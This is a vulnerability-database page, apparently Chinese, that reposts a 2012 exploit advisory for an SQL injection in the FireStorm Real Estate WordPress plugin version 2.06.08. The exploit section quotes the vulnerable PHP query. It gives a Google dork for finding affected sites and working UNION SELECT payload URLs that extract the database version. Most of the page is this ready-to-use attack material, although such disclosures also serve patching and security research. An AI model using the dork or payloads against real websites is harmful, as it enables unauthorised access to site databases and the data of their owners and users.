WordPress FireStorm Real Estate 2.06.08 SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1046103 漏洞类型
发布时间 2012-11-21 更新时间 2012-11-21
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012110147
|漏洞详情
漏洞细节尚未披露
|漏洞EXP

Title                  => FireStorm Real Estate SQL Injection.
Date                  => 10/19/2012
Version              => 2.06.08
Vendor               => http://www.firestormplugins.com
Tested on          => Microsoft Windows 7, Linux BackBox.
Discovered by     => B00B5 [http://www.hackforums.net/member.php?action=profile&uid=1403300]
Download          => http://wordpress.org/extend/plugins/fs-real-estate-plugin/
Google Dork       => inurl:"/xml/marker_listings.xml?id" filetype:xml

Vulnerable Code => if (isset($_GET['id'])) {
                   if (is_numeric($_GET['id'])) {
  
                 $query = "SELECT * FROM ".$table_prefix."fsrep_listings
 WHERE listing_long != '' AND listing_lat != '' AND listing_id = 
".$_GET['id'

PoC           => /wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=[SQL Query]
                => /wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=null UNION SELECT 1,2,3,4,version()--

Demo           
 => 
/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=null
 UNION SELECT 
1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--